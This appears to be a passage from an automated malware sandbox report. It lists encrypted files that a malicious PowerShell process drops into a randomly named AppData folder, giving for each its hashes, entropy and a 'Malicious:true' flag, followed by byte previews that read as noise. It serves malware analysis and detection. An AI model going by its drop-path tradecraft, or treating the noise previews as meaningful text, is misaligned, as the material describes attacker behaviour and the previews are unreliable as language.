                                                                                                    SSDEEP:3072:jYVXEBJJtVmzSz6w7s/LfQVCTmv2CxPZLr2:jyXEHJPOS+es/LfQR2CdBK
                                                                                                    MD5:C7009157E5C04A7E0FCF8697C3704E09
                                                                                                    SHA1:21E21756385413DCC9412FD1A0BC9AC9E2ECA5C4
                                                                                                    SHA-256:7BFF157BCCF230986332A272C98D2494BA5F0E0DBFA3C11E711C052D80D47FBC
                                                                                                    SHA-512:F8F7AE2DE683DC5A6C0692076F85DC1DC354EC4F133E55B3E520A37B920822C37550B870B5116D5D4A47F03DE203E4E40DB911C740C49433380BE34516A11CBA
                                                                                                    Malicious:true
                                                                                                    Preview: ..@6./...S..)6!Dw[.....?....:G*v...f....h......J..&s.}KI.H..0..b..j..^..*../..8.V ..$..e....zB|Oh..@?.......sY...#]..c.=y...p"x.=.'....'.C..w...W.u0......6..f6......P...........#...w...^..L..I8..W? ...w>.k ..C...o...$-.$=.p7o..<.x...}..B>@.S...t...Sw|:rs4...G_$0.L._....4...:..F|<nXC.........../(..=.gs....p.[....AI9EPYAU...>v....f...>O...O.b.P....f..%..y..2.HF..A.......kb.d.8.3.+......@.k...z~...Y.|.:.2..|.....-...n..E.*G....~Tr./_.C..}+AG..q..u..x3.....F..V.A..y...|.......T*..?.....6B.I>.0.;.Ds.B\......K.q.zKa8...'..:.....p.1...A.k...3?...W.QL.."...tw..$..HN....V...u...?gU.5.t`.f$.Y.^...{c.8.^.....`e...$..R..}.<....p..........>..1.Ow.d9..e..s9w.:..H.T.=.q.*.....<H.B.6HXX..s.<0.Dir7.X......Q.i.l:}"...J.P].F.4...l.z..6.B.nf.....`..n..`........:.t.E|VG.u...+I]H.l3.+B.K......,....l.k.......WX%.`E.@.q.ny....K..h'...O+?..W.).bSz..C.n.u1.7)..Qk......t.Y.3.[....N.....r.U.....3.%..dK.+.....]..)...=u......\..H.+6.i%q...UGn....c........V.VL..B.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJvwzhltKMWAPUDZOq.uBnMoxHGwFJATN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:locale data table
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97378
                                                                                                    Entropy (8bit):7.998132991391903
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:4J7Kt8YbFwlGb1ItuVK0TMh1Dvdun3cNHZt0i/xqQe/6iuGnFb1VO1MAefKAIHX6:YYjFoGJguVhTMhw3gHZSi/x0nuGFb10M
                                                                                                    MD5:3C28319ACFB5D1028A5E7C0CD5F20DC3
                                                                                                    SHA1:02C44E6CC67710E338E9C2DF2BDB1B0141977ED7
                                                                                                    SHA-256:F42C149DB1BBBEA7C2AEF7ACEEAB730EB20109CCFA825A4EBBB80681F6DD925D
                                                                                                    SHA-512:15B558B38D0B921477F10B7C55507E4CBB544C5529773AD960B65B27F0881AB1175A48A864B3AC2A75F622126F98D5FC5BF341FEE7516E2BE2F9C79D413C9CCC
                                                                                                    Malicious:true
                                                                                                    Preview: ..a.?H.hS.......z.v.m.W.....)i`7..R...6.....L.hK....'k.#..FA.L*q{......y_.C>.p.G.{^T.`[/.....I.,..................&...Z..\............G.uO...Q7...v...f.J..k...)..E.$3cU......4$.4.+.....?B................[-...G.....v&*..y.f..."o2.r..`.$....:...."M.b..e0J..\.hh.<$...Rb.>9..T....!f'. .0...G.Nu.....>`.i...K.6.~.hF....1s..v>g.Ye.f...&.K.c...b.......]t..[A.7.=.1.R.?. ..0...V.ty.*...J..D............. ..D.<V.W)...P....a.;...2.7..Z...t.E.+........B.aM..x....'C...........@....d.....}OG.._`....n.....=J~....j..1.)/..w....!....m.........%.O.y.X.d"....F%.(..8%..3..q....G.fg...."...@.h...6J0..}.%..]3 !-..*.T_.G..Z2...9.v.efV0l..@.N..4.>..$b...4K.2....#.......u.(....\.!...b917..q.I.1......(h.W..etX...I.d{....J.,'.*..?sy9.p4..Z.._.1..B<2..K..n..a/.Y!.5..UH...B.&ZM.p...l.;'~U7Ros.zY...L...c..i.(......+l............xj...^......U.$....N..........@.SOLb&.q...'.@h....Iy.c......#.N.C.4.\........P...f9.%.G.gm..3.,...$..r;e..UN...T...q...T.....<.9..14+...*.*....^...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fpAKDIlwxYQ.gWBVKfXIPENehRxkt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116082
                                                                                                    Entropy (8bit):7.998445430306062
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CRjvMx89OlA1fEzLGE4c4Gso4e+qq2guzmz8ESrfmBkdZKM:XFlA1kaEjso4/2gukurfmBk7N
                                                                                                    MD5:D9BEB78000251B0AC14841139D0E88E2
                                                                                                    SHA1:97145DC015D767A0664CA3123436644DA8361B15
                                                                                                    SHA-256:01CFE9D89016F5D91B125F2699659316831DCB4612C10D90C49AFA77100D8537
                                                                                                    SHA-512:EB4836EA9E4099908BF12DDCE0BB0650605557D37E8C4D59F9D5F1D0F492255AEF709CA231A8D7B90EDF108B2F0209EF923F608A938B52E5710109362445E3A4
                                                                                                    Malicious:true
                                                                                                    Preview: ..wR..X~.W...Ai.A...."O+..._.|....].P.0b.....m...ps'&.09...i.h... .I.'6...,G..O..h..6..N..P..}+...L..sI<j....p.K5.{..B.1p.}..5.7.F........L...\...Pe.+GtL.....V4....x.Hu......^T.....!5......p.e......(....Kp~S.Q...vO....+a\3MzL.?r=..#._....Z*.j.w...=..2.[~...$..J..h.SEx.....7....8.]4S....R.idG.R.i..j.E.@.#.......0...@..W.v..w....@/...S.~..."0{6..jY1.g..OI4t...........6....S..A./...........??.O.(}X..n@....3%.k.]...|..J,.+M._.a....\.Z...D...8.A.n.@6I...@B.j..A......w....V..ym.....M.G...$y......,.9*.exCOz..=..(..S.K....$..BGn..m.....).Q;....IL....S0.....0....~;.k.F.....j$.*!..Vb2A.....7.$Z.....I.I....O...k.(.).B...q8.c........A..#58GD<............T.c...U.C.8..X.)..........6..J.O.(.......Nx.b...f....&^.'..9...w.EC]).2..X.I..-u.z.....yu...a..f......Q.i[..c..w..d..TW.....Vm:...H#......../!"._....*..;.h.P. ..4...m6d.....o..l....E.q...1......zc;.M!..Z.44.....j...M..a.QG".[t.K0.i..=.l..A._..."....[g.Sn...d...........G. .B.....g.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\gITLBMtyernDGuQb.LwSzrHfIbcNkoF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):191800
                                                                                                    Entropy (8bit):7.999018931997147
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3b4g0veyG+0iNN2FZaEhgmbZxcfA23mzxvWiNOs+FeMZBST10Y4c:r4+yG+FN0bpDb7j7+A+hZB/Yb
                                                                                                    MD5:E6C147B8FC3D405DC4A2336C5BCE184D
                                                                                                    SHA1:DA3DB62B5F49EB0D123EF4E7D747251E3FC48ABE
                                                                                                    SHA-256:E4880AA4712FA1181F161692AE87484761CB3061B5ECBFC19EF0F494AC02F0A9
                                                                                                    SHA-512:930F9DC81B01201FFD95C7937AD328AB81250DE3C969D659346EB6530A23E5E3289C20A5F845D056D8F4B03D0E3ADB2DB79E41E5B77E7E6A2FF0DED517508FD2
                                                                                                    Malicious:true
                                                                                                    Preview: .7.7u4)...oB\.4.J.0-.._g.O.C ...F..4./q..8.BLy.Ov..1m..M;%M..4....9.L?..U..$.....m.....-...$...-..c.u.6P....K(.NRF....=v.do..c..^..sH*.6......D...>i..%<s..Sy*G....-.4.=*...+.......M..-o..:.k......4W..yT...........e. =..AW*v...)...\mR.b3.Z@xH..R.S.(....."*.......6./:k..M...,#..:..M...p7....O.....]%.@....y.`..K.7.m.].........dQ..........9OD.mH.9Y.sxbY...Kg......m..........D.Za...8I5{..U.gZ.X.@........._..r.......y..;.0..@.....Z...i%q.....wU<[.j.>.N...t.....I..}.$..Q._M.'..O."..L.[j...e..4B.&.J...7.L5.L..f...J.!.P.-tp...=F....h.....4.d....\A........x.1......b..6.5..q...wq.&..Em_U..2N.D.._H)..D..`..3....T..F)T.f..hK..b.Z.;.N....$O..+I..1.......?...z0..e......|....d.4..]...1..9...o.%Q..~yB.T...>.......O|..'FA.q./k^..,;#s.Q5.+QMw...]F...g..W2...#.O.<Z.O...<.N......8...2S.@.2R.V.n:K*/o+.[..r(}cfc.....B..!...B/.k.N....j...+N..b jnU...3NQXR..Bj.....!/..B.....:e!.O..D..zkm.|(|.<...3.;..d.czUn...}.......^...h...M;1"..n.~m+.....t..@S.:.XwC..6S.g!...n.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\gawkzfVWJebPKtO.qVfZEzLrwWFPKXuBk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135910
                                                                                                    Entropy (8bit):7.998827108408757
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:oSLe1LJfEAFSxY0AAPPu9ZFXZ+u/hUeqONDJt4dJ:o0SdsAFSxjAsPu9TpLeRa4J
                                                                                                    MD5:16A56855353BF06E0621D95B1AC27463
                                                                                                    SHA1:9A3661B4B0EE9A316723D2F7AF3814B2C33DE55B
                                                                                                    SHA-256:FE85D7EF728C2BB12A41F014962057443FC15B8B8D5A9D65491E662A7C66FCE5
                                                                                                    SHA-512:563DDC5FF938A9FCA34B8DB417B226A36512079F20FBC29561BC9F6A1780AF0AD2FF1B52D2CC9A45E1594CA1EFAED687E7A2A159B8038BD489D0012ED143A06E
                                                                                                    Malicious:true
                                                                                                    Preview: }r........qqG..*].Y.Nq.. .....0C.....).T+.N...E.eM..."nT.hA?.....%q./..F?...H..ab.l.{.~..N......._..5p..V.Y.U.*.Q.WG(A.p...Z.i..F.....3L.$J%.4...-......g..9j./...sQ....q...oo..M^..7...#.P.kX.UV&.u.1%..H.%..!.;.m..t....X....x.I...,v.C.t.*.J.N.a...X...B8I......@. .>$e.......U.6.R.{..&...*.K.S%.jA.e.6......x.1...k9..=p:.b~......'@..n+..v<6}..^.>0G<('..Gu.b.......@JsS.4......B......j.y......#..M.....a..x....R.N ..TW7]..[.Y...FM1.......Z....O.#q.....{.#..N..!.zg."..E.<.QW....r.VX7..u:..5mF7il.eH...`....;$.....I.z...........n...q.....9.zo..k{..!.....h...$R9 ...i.T......0....V.FL.+1X..A.....Y.....?..G....Z.........T.R....G.~.....4.!.H...]...!.8....W.S.)...O.M.@i.}.y./...P..&.E..!.(3...C..}..n....e!..bH...8......6Ch.6.Z..m.1.n...a.FV.tY.X8.s>.....RQ/&s..)Vf&...%.L.f.......WyU...7.2..:.0......q....D.Qc.6....c8.G...y6,4.....g..E.!...v.T1.....~.......f.e...6..9.eoT..V]...]U].1..ib...x.N{......ips.W=.N....e...].E.a...k..H$."...d".........r.?..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hEGsIYqpfoOB.QhnJFGiCElouTPMWOD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):151392
                                                                                                    Entropy (8bit):7.998676719440607
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:D4aVHMeLopkN51bmfmUzd122T22aYjTSs3PHh5A4jClQaR4qHblZvV19/he:TCeEmUD22Tbpjus3PzWlQtqHPVf/8
                                                                                                    MD5:1AE9A77C8879D727000E87D35358816E
                                                                                                    SHA1:834088E0F1D5F73171330FF3C28A8C3A27A38E99
                                                                                                    SHA-256:ED53311564D7FA68E404D269E03429039B7665B26F2D60AA4A0D638D24958A5B
                                                                                                    SHA-512:30E00E6A16AE2580202BAE8524B8CE8A87ABCC4E502375C79CAFDBB73DA146D68AD4ED03D5543F74D0B75DBE1842625DDBF9D6265BA021010E7DD9675C9F45A0
                                                                                                    Malicious:true
                                                                                                    Preview: ../.7.k....7..N.7P906.T.[.+k.Bq...J.Im.X4.....6@X........?6.y<B.i{...o.......;........v..ubZ.N.#Gt/ow.,..G..=...\x#4....P7..5..{b{..r1.....9.T.p..B*a..yr.?S.NJ..w.j> +..R.y....f..P.n.M..J...5#.X2..T5..C..j\.....DvS|. ....e....Pyj../..x.....Y@....>.A.............0..*...[.r..N..N....()...s.....R)....)b...F.[0..`...i...N+...u..n%..a....B;...B.;.....:....mTp..(......=I..f...z.....n..m.B>./.\.7........n..Kj...?g .1;.....Un..[h@7Gs\.}.ZT.dP?@.O.y.JZ..{.,.eA.e~.......L%I/2.\.Q.~.n..=...{c...q.7..$[S.9.4.kH(....6....[K..bO....LS.l-%*.4...B..._uYh..<.L.`89.:(..............L...N.B%w.. T..J.......\..a.~......u....w...5...Ft...)...x~.Z...S2P..../.O..Bwfk.8[z.t.,........#..A.}.ii.b......J>h(7......)..y..{t$n.......fv:..bm..!E.0.m@.X`.E'....6&...f...<'....Z/b=.......1........).8......S.k.]...Ug....jBF.RV.0.*s."...B..E$iB...o..E..].....|W..f+.y.....#QF...4Y.n.......BA=n.]....O..........".-.....}.n....T...y6O.0.."B.t..{..n..i..&..d...^=....1....Z.....+`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hFXYUJLPGR.UNGrxiYgbkXuFoahZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):70267
                                                                                                    Entropy (8bit):7.996995386014238
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:EJHGLZ1brQqiZ+Qle0g36xniGtdWwTXYAXRIQBkDgFh4:E1GLZ140QlRnisVMAXRvBkEFh4
                                                                                                    MD5:8318724FC5D86009856F7EF7BE7502A0
                                                                                                    SHA1:49395F1D970972157AA295F4A6F5789995DD7BE0
                                                                                                    SHA-256:731D57E5C15FD826C6DE8B69D01B0C228F40DBCCC7AC9E8D7207773A06F38375
                                                                                                    SHA-512:CA1287D074542BA655F629C19B750F16B4BD8CB18BDCB2DA4E856199DBE5AD27D10CF17D090690DFBA12B51326AD08AE2589261EE71103342AC94F0BF22F43AC
                                                                                                    Malicious:true
                                                                                                    Preview: .u.....nJ..I.&n.{.o..-..(....Sy...L......X(Y.......Uo+..EJ..MG.CY".....F9S;.H...z..w.d.#c..=dm.....?.7......e.p./....E...byd.....HH.G.C}.\.s..f(....9H.LF1...Z.,"..(.......1i..QI.8-.Y*....ne.=.P....B&../.........0..8j.-1.'..#G....JQ.._...3.N...~..[^.(..T...rP.3...u.i...........:R.ss!~.r...PB\_X..'s..~..1.r.(u.......l.....yV..?+.~.1.H.........,...0].#.Q.{;3.,...~;...|Q.T_....V....%JV.tjN.Y.........Y.n..v.O.....\....EW.m...'.[;....a..8....=.. ...u......2|..N...N'.................xkdh...\K.d.......V.`..V.F.Y.O6x.91..M..k.#f.......6...\..B....-....It..e..a...h...~.Ad!K&.V.Dg.8...gp....#>..k..d%..X[.[#i`. "..i..K...d.pA..l.A........~.M>...@.P.A..6H............G).."....@.....g..m....x.t..&........T...&........Q.1.....J).O.^.j....x........my....g....x...q.zp&.K?....1.K.b+L..=z....K..nB.."C7..":....6...SL..N4...#.....j..0).*jS.\+k...7.2.}.r..P..F.~M4 ..?(.i*....fW.os^.WI.....e..)..L..SDtPFR.jh..E.........LN......../^*..r.oS...JE>..2o....%<B=...,..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hNzakweXpOnRr.ZUVyXawsiqSo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131452
                                                                                                    Entropy (8bit):7.998524057923778
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VKtx75D+kH25I/xePStx6qr4tuVwy8P16rCern7p8hM:Vsx7AkH8DeMqr4tuWv6rL3p8W
                                                                                                    MD5:32279DB92272587D0399E1717C773CED
                                                                                                    SHA1:96947529B5C03FFC993DA7863AB079CBA9369407
                                                                                                    SHA-256:CC3F55715478F57E4E6B40110B56A15DA417E38BBC760F82BC4D19B213A84A4C
                                                                                                    SHA-512:B2A48AC5DE74C34B4D2255279545F6CFE3517C5E42B0119B97B0BA13253BC5FE6E17C9FE6611063E87E763C09BB4744D5756F715FA5798239932895E7EF03A7E
                                                                                                    Malicious:true
                                                                                                    Preview: |K.sg.=.9gj./........>...<....Z.g..E.Z.@....f6>.?.O..5..Q.S.0^Z....$K.E.IQ.+........'2G..}....B..zn|o......e.u..F...zYWF>...s-.o.......M..r......3...........m8..^.....+H.n.....Y.Q....].0.}Un...?..>..1....(F`..>.o.x...^u...te ..~.+...N.Kv.mo..j......)..xI.]........h..`Y>..G.]..B.......$...b..4...K.3....0f0.......:.xqdv.LY....R...o..^.......v......?t_..+7...=N..|.F..O`6i.Fy5..0.....!&.C.(.8.\..?..lrv..^...6G.,).....$.).....I._..8."o.b.Yl...s...Hg.?t.JBf.t#.k.<...V.E.q....2......HBd...>.....^.%H...,....Hg.p$,j].fN..&<.......N...2b.>H...}.o..E...~...v..d.@.P.o.k+J..9....8.f ...97.9V....W.O.P.+\.K.k.Q).>..D.}..Y7.1._..UP7..M.....]4.V...NH............./.h...-OC..a..."Q._...^......6,....=.g.^.Oh#.W../.6.=.^..c.4IfS......ez....g;;.....$.B..Z..CK....[...3..\L.<2.N.[s};./.G}.w..7.m..l....n..NF.d........MR~...%..OL.m.Nq...h[.7".J.N.c....O.,......a.A".f...c.ZG..[..."=L...D0...W/@.9..._R..<..Ez!l.......f..!....*..nRA!..72.9.{...4.<...H.-.>r.O...>......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hXqDYGUnMgWuIlLR.sZnxWdHykgCfDcpKVe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94937
                                                                                                    Entropy (8bit):7.998061117297087
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:xPN6l7f4mMN0Kkj1ZI+NpqPGihbhIXRLYH6rTIngs0zVBj/vWhOf9urhi1n7rrZC:xUlL+0ZfNpqrhIWH6r0ngdN/vffArMp4
                                                                                                    MD5:7BB240B24A59575D130D4455F9D2A056
                                                                                                    SHA1:2C5FC35EEA9C9B36327829CCB53E83D3B4CA7166
                                                                                                    SHA-256:D108C7CED6F3BBD65458407845F1A93FBFAFD8EBCF4E138F8A371BDEC886CD5C
                                                                                                    SHA-512:88E2A726BB8D38D6A852D9BBF6663B55829AB9998F8AC519F891E46C894E9CEE4A5D237803951C7741325DE529DC5156F326069C6E5EDB553572287FE434C6C9
                                                                                                    Malicious:true
                                                                                                    Preview: .N}.?.x<+.Z....}z..U.Y._.g...v..I.v.,{...y.O..y7.X..%.-.......d.8P.._oP...ocdGV..eO..v........N.?...t.!..cUC.Bp.0.H...l.3..A8..!N%0..y.-w...R..fH.0N./UTL.@H..s.{"{.@).p..m..,.1........Q.8D..._.0.p&..4....oJ.FW..3..[Ld..8.w..P.}.....V0]D6.H$.L..+#)0$.G..^s.mT..t.M..s.........*.C%.SomH..8..X..;z.I...S2..Q.r.H,)/.z.G.`O;...2L.Ld.,.m..=P.@..rt+..;.....k|.:..G.....D...z..O..u/.z..}L..1W..5.fl..{X...X....p.....d...Tj.......v...K.y.%....K.|.....kb.m......{..&H.K.......c.6.1.v.".AZ...{.....%.w. .....'..S7xJX....al..ux.y...E..UvdO.w{..T......@..v:.I .iCd.A..w@.Tv.A^ u...=..-.Z....7p.ZbD......=/...)..x.pa.x..%..g.'w..0.#+.#.TsO#...r..,..)....8....kz.xM+y...).3....K....`....~.....qi.^.a...vR..%5..t7..2....!.....}(...'b.w&Y.`rlD....7..f...e.py..............T..X.q.....;b.W.A...Lu.`...+.| .wx.(...v.b...9./....5......=..u.B.>.]4..i..k..qk...a SAo.C.%18.~.8f....|G<E.>.Alb1....... x.1.j.P.o.).....P.U.....x.-p.i...1.h0..6.M...~..M..*,.T...B.p.....^$.&...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hcaSWXdxIkBryut.GnSbFiUQNJR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106317
                                                                                                    Entropy (8bit):7.998410436301886
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HSAGIteP+cNvT77mgvvHFLuOTAyG3J0wlTn+A6w2wYm+QjWtoKHnCkk1Uq7I:yv4edvLlfFaOkJrn5i7PQ1GGI
                                                                                                    MD5:5EF4545E080B7AAFE01846578D5DE282
                                                                                                    SHA1:7D5034B4E2E942BC4CB43032F54FC8E8E8356725
                                                                                                    SHA-256:39A9F4CAA56E34070816D59B0B3BE3119EE6E9146AB927071DF8D06EACA3011C
                                                                                                    SHA-512:761B09A3ADD59BC73A49E68FD29EAE2C0A5E58DD4A9B4C6CA46BFD73F3F333968178ED8D6DF05578EAFBFDBFAC6C5BB60A3314572C307D6B7D917B9F55D92DA3
                                                                                                    Malicious:true
                                                                                                    Preview: s.3.2.Eq.1...p....M..+..U.I..;.l.H.r...:.....'...t4...H..........F'.>*..Mp...-AGdH..L.....=..F...s5.,.....".......'..Y#b..*..L.:......'C.}".?..r 8s%........L#b$z...R.....!7_.B.8...2.Q|Mx..!..Z...... %.s..tx.D..e9EO.fIC..L.....x...6.......j.#@{.o..Z._F.......x:..F..2..;........#C6..)..Z....".5..{...;........U..X........&...j+f.N..Cq.NP.`....X...s......>A...C.H..(..o;...Q.@..R."8...\.R.:..L..:.s....a(...:.".|. .6.l..9.5)..P.r.M[?.i...%b'...7....[.8.)..p79.......<.<.BGi.!............+^ y.q.+P.B.......?g.iRF_.......&.Y.......9.U.i@.$s....2@.$....A.n.:.....v.^0K.p..Yw.dM.a..q2.YNO...u......W%.j.-..:83 ..0.`.G....-..4.t.CI...0....r.......Q|-.:g.=.2.U....*=X..v.....@C.v:."..v.L..R.....v...G..M..%.d.]........so.m.q..c.XC......|P+..4W..K.....@V.j...M..W.....%h`#C..9Z......M...u:...'.y...[.~..h.L.1@.,..@..-.JF.. ."b...&0GA..N..D.xxB1..w....~...G.*.&.d.......S*...lD..{....U..W...`..r.r....d.a.T|.;.i....lr.p.Qq[.Z...~Y.+i...+...L..........A.Vs.C..n.#..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hqGZmJKCTLw.sNkaWTIvOLnKFUAJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136634
                                                                                                    Entropy (8bit):7.998613194397961
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:spHPlhAJJ4sarFfQH1f6J/WG9JH5P1tEXIJ9nE4YNH854O1T275:kwJJyY1itWG91/tE4J9nERNcKYT25
                                                                                                    MD5:2EA350D931C2BB23B03CDA74FB8CC086
                                                                                                    SHA1:21730189B2AE91E3399A196FC4312201A7471595
                                                                                                    SHA-256:595C0548F7500743644CC9FAD998AFEA6FAA72304F3DC700F749B671E0195463
                                                                                                    SHA-512:466F42404A173C1A4612360A49240F7FB14CF891B09EA069B06B7A806246DFD316A6475F3E0C30F75EDD0625CC27D7DDE1EDC3044CE52033804B407FF5E1B968
                                                                                                    Malicious:true
                                                                                                    Preview: ga...v...e.I....=...PT*b.9f.J.Q.....aE../....B....n..H...H.=..l...N..+(...a:.-H...j?.|.......M....Z...w.v..Q.......PB.X.8.\;.D.3D......'...6..%M.....W;.K.._..K.x..w"{M.(=.x....s+.{...%=...O(wy...*.Y.o..@I..JBwa..;Z..>A]`...C.gH...<..7..Y#~.......-^.Q...B........>Pb.I.9....'P ,S.0x{-.,...M...C.c.5.../.,..}......YX`/$.v[R.F...%.....Hd..G2.8..6...^.....*.B.........._-...#aI:...{.4.hbj9...z.o.. _t..04...{...y...Hn9..BoM.\..X.4...F..$...Xq......%..:1.`..zR....z.....#.m.b._WdC!}3ACn...A.f......e.*..<.y..b....|UO6...MyN....R..(S'...Z5V.;.W*wz._..G..:.J....<y0.)-./.[....XJ.ai..]..jR.U.1.F..&.NM./.....V..l.</k..h.o...~.q......:1.....#c5E}..wT..^...RKh..&,p ..:.E..s.).8#Z.R{..@3...:.}&o.6.$.!X...c..'.F.'..:.AZ.u..I.........O9'.m..H.4Z .o.5R.jD_L<B..^..2.;....s=o.%-............h.T._.>..........1nUR.f......7.....S...........y..~.1Nm.<C7E......@.n.cV..Kw.#..~..)io......cN.-I.9N.o.Z'.....37..Y.H.....8.uH3]J....M..A...9..V.......$...g...|..9.\..wp..#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\iGucUlCvKxEwoN.nONboWdZHVufETg
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):156299
                                                                                                    Entropy (8bit):7.998975578228563
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:QJz3OlbSqu4Kdo10oMWFwIP5aJpkufsPeSWrUxXaug7:Qx3Olb1B9MWFEntr8at7
                                                                                                    MD5:A5F5AD8C86F46B13F381FD35127C89F4
                                                                                                    SHA1:1C1C3C06A61490692A8B9DCC6387BA797289E0B9
                                                                                                    SHA-256:80ED5A2EC3F53E13D7DA2D27373F1510148CFDC1DB480DD7FB12F1793332335A
                                                                                                    SHA-512:637B99674893B5A986A4ECB394206A65B11A7358054C81A781E928A8952057C2A03FCACBE0B6F48480696DEFAA10DF3472EF00562487D47A8BD256D890F38A6D
                                                                                                    Malicious:true
                                                                                                    Preview: ...Q|.d....&..I..3.j.;.j".K..5..:s..o...9.;..C.....`...2|/....`...<v3..1..O.b....H=H..?..m ?..>......X.w.(......%.^.Z.qa..c..._..............9^r.&A.y..a......3$?.+#..y.@.Yit')+?;9n...3....S8N..`<2N..48.'.........+.....U........x..Z....X.#....U48:...<.Ks.S.......;O ....f. .K.4...>..j{.p.=:.E.6......M....N+...q)(WE.......wJ!..5.....q..P.-d...P\...m./Z%fO.N..ATQ........[..>&........7!.+..."............p.g`..5..Z.<T.._.<.89...Vv.........3...9Gp[;f..O..b^...7.F....~......K3.U4.:..df.--9R....Z.`[mW..'.8.D.......k@w-.Q........}......}-.p...pu..[:..@k...WN....[...E..IL{ht._#..Tk...q..*[.u%bJ....w.[...#.+.*...3.n.>[..]..'.....]]W..W...p%.c..y...V..<(.$......,E.dS.IPnj..k...!.o...". /..:.kZ..7N&...%.Q..*6..h...".C#...4......Y..8.....r..Y..@mJO.@...J......N......%.t...f............\U...L|..z.>..T.Pnb.....l...3....v...Yj..../4$.x.xs=.x...F.=... f..=S.U]|`....K..P"9.).1.t..J2....X..$......<6......\..v".t..J`.......+7P.-=y:8....Ei&p..Y.Ev,o....*...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\iIGPluZOfbEmYh.ioCBfbmrAwnNlaUsE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90057
                                                                                                    Entropy (8bit):7.998292972258482
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:fPflwKuKrK43cprspnXIVjfYNN3GcUkATyxU46Xh1XkaxGN5ZxOLJX+iE2QaPWxj:flRu+sp2YVsZVoy1OrXKO+iEtaW1
                                                                                                    MD5:003A240E11B5395C55278BEA82E7ABC1
                                                                                                    SHA1:A435B19D066003082BA78905F0F12FA16D365EA5
                                                                                                    SHA-256:11AF2360B531B86455265C8FA17695B5A1305BC9D716791CAC61E62D53CC4048
                                                                                                    SHA-512:040661C4276E78369591B9B545E4F79F986378491C1DC70019DB7EB7FB4B256AC37214BEE4EE27C70384447886D939ADC34F71BBD7DBE1E9D6567198E634E72F
                                                                                                    Malicious:true
